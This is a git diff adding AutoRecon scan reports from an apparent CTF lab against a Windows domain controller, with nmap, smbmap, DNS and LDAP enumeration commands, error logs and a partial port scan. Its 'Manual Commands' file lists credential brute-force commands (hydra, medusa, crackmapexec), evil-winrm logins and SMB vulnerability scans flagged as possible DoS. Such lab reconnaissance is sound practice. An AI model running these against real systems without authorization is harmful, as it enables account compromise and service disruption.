"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md new file mode 100644 index 00000000..8de4cabf --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md @@ -0,0 +1,56 @@ +``` +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + +[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1). +[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png +[-] Error Output: +QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root' +Loading page (1/2) +[> ] 0% +[==============================> ] 50% +[==============================> ] 50% +Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore) +Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found +Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found +libva info: VA-API version 1.17.0 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so +libva info: Found init function __vaDriverInit_1_17 +libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed +libva info: va_openDriver() returns 1 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so +libva info: Found init function __vaDriverInit_1_8 +libva info: va_openDriver() returns 0 +[============================================================] 100% +Rendering (2/2) +[> ] 0% +[===============> ] 25% +[============================================================] 100% +Done +Exit with code 1 due to network error: HostNotFoundError + + +[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1). +[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 +[-] Error Output: + + +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md new file mode 100644 index 00000000..78e95072 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md @@ -0,0 +1,221 @@ +```bash +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49673 + + [-] RPC Client: + + rpcclient -p 49673 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md new file mode 100644 index 00000000..f6e1683e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md @@ -0,0 +1,4 @@ +Identified Architecture: 64-bit + +Identified HTTP Server: Microsoft-IIS/10.0 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md new file mode 100644 index 00000000..10ab2e98 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md @@ -0,0 +1,82 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131 +adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time. +adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time. +Nmap scan report for 10.129.243.131 +Host is up, received user-set (0.046s latency). +Scanned at 2023-10-28 13:45:20 CEST for 873s +Not shown: 65516 filtered tcp ports (no-response) +PORT STATE SERVICE REASON VERSION +53/tcp open domain syn-ack ttl 127 Simple DNS Plus +80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 +|_http-server-header: Microsoft-IIS/10.0 +| http-methods: +|_ Supported Methods: GET HEAD OPTIONS +|_http-title: Slandovia Energy +88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:58:41Z) 